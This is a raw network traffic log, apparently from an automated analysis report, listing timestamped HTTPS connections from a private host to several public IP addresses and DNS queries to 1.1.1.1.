                                                                                                                                          Nov 18, 2024 06:49:04.303694010 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:04.303715944 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:04.303818941 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:04.304059982 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:04.304078102 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:04.999773979 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.000093937 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.000111103 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.003724098 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.003806114 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.004085064 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.004232883 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.004239082 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.004256964 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.052258968 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.052275896 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.101604939 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.155221939 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.155555010 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.155572891 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.155927896 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.156239033 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.156308889 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.211280107 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.233541012 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.233609915 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.233670950 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.233700037 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.233778954 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.233835936 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.234700918 CET52946443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.234719038 CET4435294635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.246192932 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.249286890 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.249339104 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.249427080 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.249644995 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.249701977 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.249766111 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.249835014 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.249854088 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.250153065 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.250168085 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.287333012 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.433554888 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.433746099 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.433820963 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.434096098 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.434108973 CET4435294735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:05.434130907 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:05.434160948 CET52947443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.102083921 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.102458000 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.102515936 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.103693962 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.104027033 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.104175091 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.104181051 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.104197979 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.152286053 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.172348976 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.172643900 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.172661066 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.173789024 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.174092054 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.174221992 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.174226046 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.174263000 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.216387033 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.289273024 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.289447069 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.289541006 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.289975882 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.289975882 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.289990902 CET4435294835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.290040970 CET52948443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.360977888 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.361167908 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.361243963 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.361592054 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.361607075 CET4435294935.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:06.361615896 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:06.361732960 CET52949443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:08.064626932 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:08.064718008 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:08.064779043 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:08.216146946 CET55198443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:08.216173887 CET4435519835.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:14.422204018 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:14.422327042 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:14.422482014 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:14.422791958 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:14.422827959 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.084254980 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.084655046 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.084726095 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.085100889 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.085532904 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.085606098 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.085714102 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.085763931 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.085777044 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.543390989 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.543890953 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.544008970 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.544600010 CET52950443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.544644117 CET4435295035.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.547633886 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:15.547652960 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.547745943 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:15.547960043 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:15.547972918 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.556148052 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.556171894 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.556250095 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.556284904 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.556314945 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.556363106 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.556540012 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.556550980 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:15.556680918 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:15.556691885 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.404686928 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.405011892 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:16.405033112 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.405344963 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.405797005 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:16.405850887 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.406030893 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:16.408795118 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.409019947 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.409044981 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.409409046 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.409744978 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.409811974 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.410068989 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.416795969 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.417114973 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.417135954 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.418287992 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.418631077 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.418812990 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.447336912 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.451368093 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.471826077 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.602808952 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.602865934 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.602931023 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:16.603908062 CET52951443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:49:16.603925943 CET4435295152.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.660660982 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.660684109 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.660756111 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.660758018 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.660809040 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.661519051 CET52952443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.661534071 CET4435295235.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.680664062 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.682322979 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.682353020 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.682439089 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.682683945 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.682697058 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.723337889 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.867036104 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.867150068 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:16.867222071 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.868141890 CET52953443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:16.868160009 CET4435295335.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.340481043 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.341207981 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:17.341233969 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.341542006 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.342355013 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:17.342408895 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.355349064 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:17.403328896 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.541281939 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.541359901 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:17.541440010 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:17.556576967 CET52954443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:49:17.556592941 CET4435295435.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:22.614411116 CET52955443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:49:22.614458084 CET44352955142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:22.614572048 CET52955443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:49:22.614784956 CET52955443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:49:22.614794970 CET44352955142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:23.468611956 CET44352955142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:23.468975067 CET52955443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:49:23.468996048 CET44352955142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:23.469456911 CET44352955142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:23.469779968 CET52955443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:49:23.469856977 CET44352955142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:49:23.523432016 CET52955443192.168.2.16142.250.186.132
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 18, 2024 06:47:17.976619959 CET53516641.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:18.005517960 CET53582561.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:18.814091921 CET5313853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:18.815201044 CET5976253192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:18.820971966 CET53531381.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:18.823951006 CET53597621.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.233841896 CET53610621.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:20.293605089 CET5487853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:20.293729067 CET5749453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:21.008407116 CET53574941.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:21.315447092 CET5171253192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:21.467499018 CET53548781.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:21.467549086 CET53517121.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.483021021 CET5899153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:22.483346939 CET5321553192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:22.497044086 CET53589911.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.497113943 CET6029153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:22.497281075 CET5456653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:22.503670931 CET53602911.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.503820896 CET53545661.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.519025087 CET53532151.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.280569077 CET53516661.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.811589003 CET6186353192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.811781883 CET5725153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.812160969 CET5499653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.812323093 CET5420853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.812640905 CET5432353192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.812804937 CET6450853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.818324089 CET53572511.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.818903923 CET53618631.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.818928957 CET53542081.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.819025040 CET53549961.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.819717884 CET53543231.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.819813013 CET53645081.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.811235905 CET5768153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:24.811414003 CET5295553192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:24.818458080 CET53576811.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.818475008 CET53529551.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.828246117 CET5860353192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:24.828432083 CET6516253192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:24.836097956 CET53651621.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:24.836381912 CET53586031.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.593018055 CET5461653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:25.593269110 CET6013453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:25.599982977 CET53601341.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.600579977 CET53546161.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.607702971 CET5879053192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:25.607897043 CET5849953192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:25.615600109 CET53584991.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.615621090 CET53587901.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.831547022 CET6391453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:27.831737041 CET5991853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:27.838592052 CET53599181.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.838620901 CET53639141.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.911341906 CET4939853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:35.911494970 CET6208353192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:36.109797001 CET53493981.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.173779011 CET53620831.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:37.541086912 CET5226153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:37.541518927 CET6122653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:37.549437046 CET5719853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:37.549577951 CET6138753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:37.605618954 CET53612261.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:37.638339043 CET53571981.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:37.856513977 CET53613871.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.496248960 CET5167453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:38.496366978 CET5672153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:38.504378080 CET53567211.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:39.396884918 CET5357853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:39.397062063 CET6320553192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:42.128200054 CET5563253192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:42.128362894 CET5804253192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:42.136132956 CET53580421.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.666227102 CET5957453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:43.666414976 CET6534953192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:43.673192978 CET53595741.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.673305035 CET53653491.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.283593893 CET6045253192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:45.283855915 CET5972753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:45.290519953 CET53597271.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.290644884 CET53604521.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:53.023428917 CET53619791.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:08.873028040 CET5095353192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:08.873224020 CET5696053192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:12.432691097 CET6282553192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:12.433152914 CET6387653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:12.455331087 CET53628251.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:12.458910942 CET53638761.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.540061951 CET6344653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:13.540365934 CET5202453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:13.577562094 CET53520241.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:13.588326931 CET53634461.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:16.227941036 CET6157553192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:16.227977991 CET5404553192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:16.248250008 CET53540451.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:16.256958008 CET53615751.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:17.974560022 CET53613961.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:18.916764021 CET138138192.168.2.16192.168.2.255
                                                                                                                                          Nov 18, 2024 06:48:24.631359100 CET5872753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:24.631757021 CET5608853192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:24.645729065 CET53560881.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.649712086 CET53587271.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.651628971 CET53491781.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.704027891 CET53592521.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.361298084 CET5019753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:26.361454010 CET5621453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:26.368392944 CET53562141.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.376190901 CET53501971.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.841169119 CET6182753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:27.841353893 CET5079453192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:28.757958889 CET53580861.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.186285973 CET53647281.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:42.242254019 CET53628951.1.1.1192.168.2.16
                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
